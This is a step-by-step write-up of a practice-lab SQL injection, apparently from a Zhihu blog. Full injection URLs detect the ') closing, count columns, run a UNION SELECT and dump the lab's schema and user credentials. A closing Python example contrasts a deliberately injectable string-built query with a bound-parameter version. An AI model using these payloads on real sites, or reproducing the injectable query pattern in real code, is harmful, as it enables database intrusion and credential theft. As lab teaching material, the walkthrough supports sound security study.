2019-08-03 Manual Testing of a Simple SQL Injection

Online SQL injection practice platform (http://leettime.net)

Practice: Basic Module 4

1. Determine the closing characters and the number of columns

http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1


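The page displays its normal content.

Closing with a double quote " shows the normal page, so this is not the closing character.

http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%22

Closing with a double quote plus a single quote "' shows an error page, so this is not the closing character.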

http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%22%27


The screenshot shows that a parenthesis ) is also present.

Trying the closing characters ') followed by -- - succeeds.

http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%27)%20or%201=1%20--%20-


Next, get the number of columns in the table.

http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%27)%20order%20by%202%20--%20-


http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%27)%20order%20by%204%20--%20-


order by 5 -- - produces an error, which means the table has 4 columns.

2. Find where data is echoed back and retrieve the data

http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%27)%20%20and%201=2%20union%20select%201,2,3,4%20--%20-

Queried data can be echoed back at the second line.

Database name query: leettime_761wHole

http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%27)%20%20and%201=2%20union%20select%201,database(),3,4%20--%20-

Database installation path (@@basedir): /usr/

Find the table names: testtable1,userlogs,users

http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%27)%20%20and%201=2%20union%20select%201,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27leettime_761wHole%27),3,4%20--%20-

Find the column names: id,username,password,user_type,sec_code

http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%27)%20%20and%201=2%20union%20select%201,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27leettime_761wHole%27%20and%20table_name=%27users%27),3,4%20--%20-

Username is : #injector#khan#,#decompiler#hacktract#,#devilhunte#dante#,#Zen#sec-idiots#,#Zenodermus#security-i#,#grayhat#hacker#,#khan#haxor#,#admin#sadmin#

http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%27)%20%20and%201=2%20union%20select%201,(select%20group_concat(0x23,username,0x23,password,0x23)%20from%20leettime_761wHole.users),3,4%20--%20-

Summary: get familiar with the structure of information_schema, and pay attention to how group_concat is used.

https://zhuanlan.zhihu.com/p/76518525
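
Why the ') sequence breaks out of the query, and how a bound parameter stops it, as an added example that is not part of the original post. SQLite stands in for the lab's MySQL backend; the query shape, the sample rows and the function names are assumptions, and the request values are the URL-decoded ones from the steps above.

```python
import sqlite3

# Requests from the walkthrough above, URL-decoded (values taken from the page).
PAYLOADS = {
    "tautology": "1') or 1=1 -- -",
    "order_by_4": "1') order by 4 -- -",
    "order_by_5": "1') order by 5 -- -",
    "union": "1')  and 1=2 union select 1,2,3,4 -- -",
}

def make_db():
    # Constructed sample rows; SQLite stands in for the lab's MySQL backend.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id TEXT, username TEXT, password TEXT, user_type TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?, ?)",
                   [("1", "alice", "pw-a", "user"), ("2", "bob", "pw-b", "admin")])
    return db

def lookup_concat(db, user_id):
    # Assumed shape of the lab query: the value sits inside ('...'), so input
    # containing ') ends the literal and everything after it is parsed as SQL.
    sql = ("SELECT id, username, password, user_type FROM users "
           "WHERE id=('" + user_id + "')")
    return db.execute(sql).fetchall()

def lookup_bound(db, user_id):
    # Bound parameter: the value is passed as data and never parsed as SQL.
    return db.execute("SELECT id, username, password, user_type FROM users "
                      "WHERE id=(?)", (user_id,)).fetchall()

def compare(db):
    # Returns {name: (concat_result, bound_result)}; SQL errors are recorded by class name.
    out = {}
    for name, value in PAYLOADS.items():
        try:
            leaked = lookup_concat(db, value)
        except sqlite3.OperationalError as exc:
            leaked = type(exc).__name__
        out[name] = (leaked, lookup_bound(db, value))
    return out

if __name__ == "__main__":
    for name, (leaked, safe) in compare(make_db()).items():
        print(f"{name:11} concat={leaked!r} bound={safe!r}")
```

With the bound query every one of these requests is compared as a literal id string and matches no row, so the column-count probe and the union never reach the SQL parser.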
